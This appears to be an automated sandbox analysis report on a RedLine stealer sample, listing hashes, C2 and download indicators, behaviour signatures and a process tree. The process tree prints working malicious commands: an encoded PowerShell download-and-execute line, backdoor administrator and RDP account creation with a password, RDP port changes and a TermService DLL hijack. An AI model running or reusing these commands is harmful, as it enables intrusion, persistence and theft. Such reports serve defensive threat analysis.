Analysis
- max time kernel: 111s
- max time network: 163s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 07-06-2021 11:42
Static task: static1
Behavioral task: behavioral1 (Sample: ustwo_20210607-133958.exe, Resource: win7v20210410)
Behavioral task: behavioral2 (Sample: ustwo_20210607-133958.exe, Resource: win10v20210410)
General
- Target: ustwo_20210607-133958.exe
- Size: 120KB
- MD5: bc3443ee6ebeac5b40d789367a61cc36
- SHA1: 3aca0e6d34866853b9ed702d76e0222952451eb4
- SHA256: 875f42b4ae4e80050231b14e50770f8e51a7b1f9887504ab6699860c9d37d09c
- SHA512: bb2450f210eb7ab34a51c91b28edbfb671570d47a9c8033fd74dc1437c2e99107e4052a8a6a911b6ccf5d29fa206bb173064a83ea47cddd83819079260430240
Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
- Extracted: Family redline, Botnet N6, C2 lyanannaron.xyz:80
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource | yara_rule
behavioral2/memory/2324-124-0x0000000000417D76-mapping.dmp | family_redline
behavioral2/memory/2324-123-0x0000000000400000-0x000000000041E000-memory.dmp | family_redline
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 6 IoCs
Processes:
flow | pid | process
25 | 4056 | powershell.exe
27 | 4056 | powershell.exe
28 | 4056 | powershell.exe
29 | 4056 | powershell.exe
31 | 4056 | powershell.exe
33 | 4056 | powershell.exe
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
pid | process
3260 | filename.exe
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource | yara_rule
\Windows\Branding\mediasrv.png | upx
\Windows\Branding\mediasvc.png | upx
-
Deletes itself 1 IoCs
Processes:
pid | process
1728 | powershell.exe
-
Loads dropped DLL 2 IoCs
Processes:
pid | process
2980
2980
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
20 | ipinfo.io
21 | ipinfo.io
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
description | pid | process | target process
PID 3992 set thread context of 2324 | 3992 | ustwo_20210607-133958.exe | ustwo_20210607-133958.exe
-
Drops file in Program Files directory 4 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | powershell.exe
-
Drops file in Windows directory 18 IoCs
Processes:
description | ioc | process
File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA52D.tmp | powershell.exe
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | powershell.exe
File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_qboewj5a.h2y.ps1 | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | powershell.exe
File created | C:\Windows\branding\mediasrv.png | powershell.exe
File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_lztjzhpr.yka.psm1 | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA50C.tmp | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA51C.tmp | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA52E.tmp | powershell.exe
File created | C:\Windows\branding\mediasvc.png | powershell.exe
File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA4EB.tmp | powershell.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
HTTP User-Agent header | 28 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 29 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 31 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 27 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
pid | process
2324 | ustwo_20210607-133958.exe
2324 | ustwo_20210607-133958.exe
1728 | powershell.exe
1728 | powershell.exe
1728 | powershell.exe
4016 | powershell.exe
4016 | powershell.exe
4016 | powershell.exe
2284 | powershell.exe
2284 | powershell.exe
2284 | powershell.exe
2884 | powershell.exe
2884 | powershell.exe
2884 | powershell.exe
1728 | powershell.exe
1728 | powershell.exe
1728 | powershell.exe
4056 | powershell.exe
4056 | powershell.exe
4056 | powershell.exe
-
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid | process
620
620
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
(each entry: [depth in the process tree] image path, then the command line, then the signatures matched for that process)

[1] C:\Users\Admin\AppData\Local\Temp\ustwo_20210607-133958.exe
    "C:\Users\Admin\AppData\Local\Temp\ustwo_20210607-133958.exe"
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
[2] C:\Users\Admin\AppData\Local\Temp\ustwo_20210607-133958.exe
    C:\Users\Admin\AppData\Local\Temp\ustwo_20210607-133958.exe
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
[3] C:\Users\Admin\AppData\Local\Temp\filename.exe
    "C:\Users\Admin\AppData\Local\Temp\filename.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
[4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    - Deletes itself
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
[5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s4uxyrte\s4uxyrte.cmdline"
    - Suspicious use of WriteProcessMemory
[6] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6543.tmp" "c:\Users\Admin\AppData\Local\Temp\s4uxyrte\CSC940AA4FF2B0A4866A69C7916656BD38D.TMP"
[5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[5] C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
[5] C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    - Modifies registry key
[5] C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
[5] C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - Suspicious use of WriteProcessMemory
[6] C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
[5] C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    - Suspicious use of WriteProcessMemory
[6] C:\Windows\system32\cmd.exe
    cmd /c net start rdpdr
    - Suspicious use of WriteProcessMemory
[7] C:\Windows\system32\net.exe
    net start rdpdr
    - Suspicious use of WriteProcessMemory
[8] C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start rdpdr
[5] C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    - Suspicious use of WriteProcessMemory
[6] C:\Windows\system32\cmd.exe
    cmd /c net start TermService
    - Suspicious use of WriteProcessMemory
[7] C:\Windows\system32\net.exe
    net start TermService
    - Suspicious use of WriteProcessMemory
[8] C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start TermService
[5] C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
[5] C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe user WgaUtilAcc 000000 /del
    - Suspicious use of WriteProcessMemory
[2] C:\Windows\system32\net.exe
    net.exe user WgaUtilAcc 000000 /del
    - Suspicious use of WriteProcessMemory
[3] C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe user WgaUtilAcc CMmJStNp /add
    - Suspicious use of WriteProcessMemory
[2] C:\Windows\system32\net.exe
    net.exe user WgaUtilAcc CMmJStNp /add
    - Suspicious use of WriteProcessMemory
[3] C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc CMmJStNp /add
[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory
[2] C:\Windows\system32\net.exe
    net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory
[3] C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
    - Suspicious use of WriteProcessMemory
[2] C:\Windows\system32\net.exe
    net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
    - Suspicious use of WriteProcessMemory
[3] C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
[2] C:\Windows\system32\net.exe
    net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
[3] C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe user WgaUtilAcc CMmJStNp
[2] C:\Windows\system32\net.exe
    net.exe user WgaUtilAcc CMmJStNp
[3] C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc CMmJStNp
[1] C:\Windows\System32\cmd.exe
    cmd.exe /C wmic path win32_VideoController get name
[2] C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
[1] C:\Windows\System32\cmd.exe
    cmd.exe /C wmic CPU get NAME
[2] C:\Windows\System32\Wbem\WMIC.exe
    wmic CPU get NAME
[1] C:\Windows\System32\cmd.exe
    cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
[2] C:\Windows\system32\cmd.exe
    cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
[3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ustwo_20210607-133958.exe.logMD5
4a30a8132195c1aa1a62b78676b178d9
SHA1506e6d99a2ba08c9d3553af30daaaa0fc46ae4be
SHA25671636c227625058652c089035480b7bb3e5795f3998bc9823c401029fc844a20
SHA5123272b5129525c2b8f7efb99f5a2115cf2572480ff6938ca80e63f02c52588216f861307b9ef962ba015787cae0d5a95e74ebb5fe4b35b34f1c4f3a7deac8ce09
-
C:\Users\Admin\AppData\Local\Temp\RES6543.tmpMD5
b2a4a4cb161bec878cde5a991b7263e0
SHA11dfc5820859f0c0e75ea8892ad0722137cae0b6c
SHA25684d9ec8936f634bee82f8b22cde78a82de98a85b2cef6afcba0356100c52bf4c
SHA51202ee08d7eadffdf979a89700b31f7d50ae7f300a8c744fa6083f5a491b134d7b766fa6bb9085f7727500528298b16bec82157ad534b0313c9d92fe7c278be507
-
C:\Users\Admin\AppData\Local\Temp\filename.exeMD5
505588539c4e6b741da239143f0f37fb
SHA1ad48f0be39fff9408cf51f038289c9e39e6c774a
SHA25609ce67093a7bb080fab93aafce87ad6ba1c6afe168b1cf1e9a0fc7a0056ad599
SHA5120533288c77c8d63db8668621ba04786331d7e179609c5a5e2637541b54c7caf3fd117b694ab7ab42a07203272773d8be633c3fe89737b00d578c6d2fd6062eee
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1
MD5 3447df88de7128bdc34942334b2fab98
SHA1 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA256 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA512 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
MD5 dd7b84038b6d2f08e9b16705e68f5164
SHA1 624bbab0b9e3a5c2abb6bfcbc55f42cf82c02b51
SHA256 019d890cab31b27de41fe758c79c10285ba1e185fcf46c55ad36c5b79178b1dd
SHA512 ab12b887723b8d7cfab0b242c8b4217995d36669b373003d1c808bdde70b62388bcdf0d8a4b20b70ac33f3d296bab2e733aea96bb17d7b7b596aec1869b390eb
-
C:\Users\Admin\AppData\Local\Temp\s4uxyrte\s4uxyrte.dll
MD5 1f27fd5c3d72d9d40fed79be734e6d0f
SHA1 b657163c9983a3794b4ca3aa8a8b0598ab60b39d
SHA256 b6d7ec0d0453f659427d49ce43f5e66ecfea532aa2ed5bd26b21121d5084fb27
SHA512 869e5627594683931ab9a797099c07268baf4cd22a6455c6898b0ad5437411ff3bd1cb74bcce9ef477fed812983dd20c33c91029002725b5c833bd51a5fdd520
-
\??\c:\Users\Admin\AppData\Local\Temp\s4uxyrte\CSC940AA4FF2B0A4866A69C7916656BD38D.TMP
MD5 3e88492ef6a2d06e174c74038b79f9c2
SHA1 719409e27ec5ad1822b710262b26b98eb7a40e99
SHA256 a5fd07a0a20d55993017792c4c7d28aad8365e10414559a926f6f5a544e2f848
SHA512 89687b45ca5522a400ce3258e66366e7f8aaeb265851f0da44be4058743da879b5febd3475c640c2af695ecadb4702a616e2e292b85489f71e0bb2c3c4459a90
-
\??\c:\Users\Admin\AppData\Local\Temp\s4uxyrte\s4uxyrte.0.cs
MD5 4864fc038c0b4d61f508d402317c6e9a
SHA1 72171db3eea76ecff3f7f173b0de0d277b0fede7
SHA256 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA512 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\s4uxyrte\s4uxyrte.cmdline
MD5 f04a08ac2fa962afef12dfbcf0699c00
SHA1 ad8fd1c08ac53b61fa4d3e725f8a88a302a8c5c3
SHA256 e814943bc3f505ab6b3471947e6da398bcadc5ab6241ca3b7a1ab2cc5e5d5d3f
SHA512 a71b7dbad6e456388ef263a674e41478556de72c33fff3e312faee078ca9aae202113d822f9ca57754b3b119ba3ec299625a0f887c71e8e58dfdb6f810371796
-
\Windows\Branding\mediasrv.png
MD5 e723ee58ac7eaa89545e826ded0d3784
SHA1 e6b3e719cd9c577c6de8ca0e86dc178762e2166b
SHA256 5c8730a1ca5d16938512fade07e410b883d34c8bf7449a7a8acf7772dd5f97f7
SHA512 a3a0902293144c901ec8400de191296830a522230a530439c30d7969d1aef14000aace04d32734c5e7e1f64d0bf84a4eea70a0cc11ff525125975c174026ed60
-
\Windows\Branding\mediasvc.png
MD5 98131ba8b134e7e8b9c35874bb45416a
SHA1 267181fabcedddcb52bd7ec2e8f097f841701e17
SHA256 1b6065bb160f343804e8ec6d975946ccf06b792d68c04b8cb905714774af93cd
SHA512 1276c9ac17e307371f0af7ce25022589ddf9da23e5b57ab9e7a75912cbdd38545c91ef0d9ee1fe706491ef6c0fcb4a6152dea4b0df2e8594ae253f23cb5198e0

memory/184-243-0x0000000000000000-mapping.dmp
memory/200-167-0x0000000000000000-mapping.dmp
memory/372-224-0x0000000000000000-mapping.dmp
memory/496-253-0x0000000000000000-mapping.dmp
memory/636-221-0x0000000000000000-mapping.dmp
memory/900-220-0x0000000000000000-mapping.dmp
memory/900-238-0x0000000000000000-mapping.dmp
memory/936-230-0x0000000000000000-mapping.dmp
memory/1304-246-0x0000000000000000-mapping.dmp
memory/1728-154-0x000001ECFCDD0000-0x000001ECFCDD1000-memory.dmp  Filesize 4KB
memory/1728-182-0x000001ECFD600000-0x000001ECFD601000-memory.dmp  Filesize 4KB
memory/1728-175-0x000001ECFCF20000-0x000001ECFCF21000-memory.dmp  Filesize 4KB
memory/1728-183-0x000001ECFD990000-0x000001ECFD991000-memory.dmp  Filesize 4KB
memory/1728-146-0x0000000000000000-mapping.dmp
memory/1728-151-0x000001ECE2590000-0x000001ECE2592000-memory.dmp  Filesize 8KB
memory/1728-152-0x000001ECE2593000-0x000001ECE2595000-memory.dmp  Filesize 8KB
memory/1728-197-0x000001ECE2598000-0x000001ECE2599000-memory.dmp  Filesize 4KB
memory/1728-159-0x000001ECFCF80000-0x000001ECFCF81000-memory.dmp  Filesize 4KB
memory/1728-170-0x000001ECE2596000-0x000001ECE2598000-memory.dmp  Filesize 8KB
memory/1972-237-0x0000000000000000-mapping.dmp
memory/2232-233-0x0000000000000000-mapping.dmp
memory/2284-212-0x0000026271DC6000-0x0000026271DC8000-memory.dmp  Filesize 8KB
memory/2284-207-0x0000000000000000-mapping.dmp
memory/2284-210-0x0000026271DC3000-0x0000026271DC5000-memory.dmp  Filesize 8KB
memory/2284-209-0x0000026271DC0000-0x0000026271DC2000-memory.dmp  Filesize 8KB
memory/2284-213-0x0000026271DC8000-0x0000026271DCA000-memory.dmp  Filesize 8KB
memory/2296-223-0x0000000000000000-mapping.dmp
memory/2324-133-0x0000000005800000-0x0000000005801000-memory.dmp  Filesize 4KB
memory/2324-123-0x0000000000400000-0x000000000041E000-memory.dmp  Filesize 120KB
memory/2324-124-0x0000000000417D76-mapping.dmp
memory/2324-128-0x0000000005BE0000-0x0000000005BE1000-memory.dmp  Filesize 4KB
memory/2324-129-0x00000000054F0000-0x00000000054F1000-memory.dmp  Filesize 4KB
memory/2324-134-0x0000000006950000-0x0000000006951000-memory.dmp  Filesize 4KB
memory/2324-130-0x0000000005550000-0x0000000005551000-memory.dmp  Filesize 4KB
memory/2324-132-0x00000000055C0000-0x00000000055C1000-memory.dmp  Filesize 4KB
memory/2324-131-0x00000000055D0000-0x00000000055D1000-memory.dmp  Filesize 4KB
memory/2328-229-0x0000000000000000-mapping.dmp
memory/2408-222-0x0000000000000000-mapping.dmp
memory/2732-247-0x0000000000000000-mapping.dmp
memory/2772-245-0x0000000000000000-mapping.dmp
memory/2784-235-0x0000000000000000-mapping.dmp
memory/2884-217-0x00000168F9A68000-0x00000168F9A6A000-memory.dmp  Filesize 8KB
memory/2884-216-0x00000168F9A66000-0x00000168F9A68000-memory.dmp  Filesize 8KB
memory/2884-211-0x0000000000000000-mapping.dmp
memory/2884-214-0x00000168F9A60000-0x00000168F9A62000-memory.dmp  Filesize 8KB
memory/2884-215-0x00000168F9A63000-0x00000168F9A65000-memory.dmp  Filesize 8KB
memory/3052-234-0x0000000000000000-mapping.dmp
memory/3144-240-0x0000000000000000-mapping.dmp
memory/3144-225-0x0000000000000000-mapping.dmp
memory/3160-171-0x0000000000000000-mapping.dmp
memory/3172-252-0x0000000000000000-mapping.dmp
memory/3180-242-0x0000000000000000-mapping.dmp
memory/3184-239-0x0000000000000000-mapping.dmp
memory/3260-145-0x0000020C79726000-0x0000020C79727000-memory.dmp  Filesize 4KB
memory/3260-137-0x0000000000000000-mapping.dmp
memory/3260-140-0x0000020C79B70000-0x0000020C79F91000-memory.dmp  Filesize 4.1MB
memory/3260-143-0x0000020C79723000-0x0000020C79725000-memory.dmp  Filesize 8KB
memory/3260-142-0x0000020C79720000-0x0000020C79722000-memory.dmp  Filesize 8KB
memory/3260-144-0x0000020C79725000-0x0000020C79726000-memory.dmp  Filesize 4KB
memory/3332-227-0x0000000000000000-mapping.dmp
memory/3392-226-0x0000000000000000-mapping.dmp
memory/3680-236-0x0000000000000000-mapping.dmp
memory/3888-218-0x0000000000000000-mapping.dmp
memory/3940-219-0x0000000000000000-mapping.dmp
memory/3984-228-0x0000000000000000-mapping.dmp
memory/3992-120-0x00000000051A0000-0x00000000051A1000-memory.dmp  Filesize 4KB
memory/3992-117-0x0000000004E10000-0x0000000004E11000-memory.dmp  Filesize 4KB
memory/3992-116-0x0000000005270000-0x0000000005271000-memory.dmp  Filesize 4KB
memory/3992-122-0x0000000005180000-0x000000000518A000-memory.dmp  Filesize 40KB
memory/3992-121-0x0000000005140000-0x0000000005141000-memory.dmp  Filesize 4KB
memory/3992-114-0x0000000000540000-0x0000000000541000-memory.dmp  Filesize 4KB
memory/3992-119-0x0000000004D70000-0x000000000526E000-memory.dmp  Filesize 5.0MB
memory/3992-118-0x0000000004DA0000-0x0000000004DA1000-memory.dmp  Filesize 4KB
memory/4016-190-0x0000000000000000-mapping.dmp
memory/4016-198-0x0000014C45520000-0x0000014C45522000-memory.dmp  Filesize 8KB
memory/4016-199-0x0000014C45523000-0x0000014C45525000-memory.dmp  Filesize 8KB
memory/4016-206-0x0000014C45526000-0x0000014C45528000-memory.dmp  Filesize 8KB
memory/4016-208-0x0000014C45528000-0x0000014C4552A000-memory.dmp  Filesize 8KB
memory/4048-244-0x0000000000000000-mapping.dmp
memory/4056-249-0x000001A729670000-0x000001A729672000-memory.dmp  Filesize 8KB
memory/4056-250-0x000001A729673000-0x000001A729675000-memory.dmp  Filesize 8KB
memory/4056-251-0x000001A729676000-0x000001A729678000-memory.dmp  Filesize 8KB
memory/4056-248-0x0000000000000000-mapping.dmp
memory/4056-241-0x0000000000000000-mapping.dmp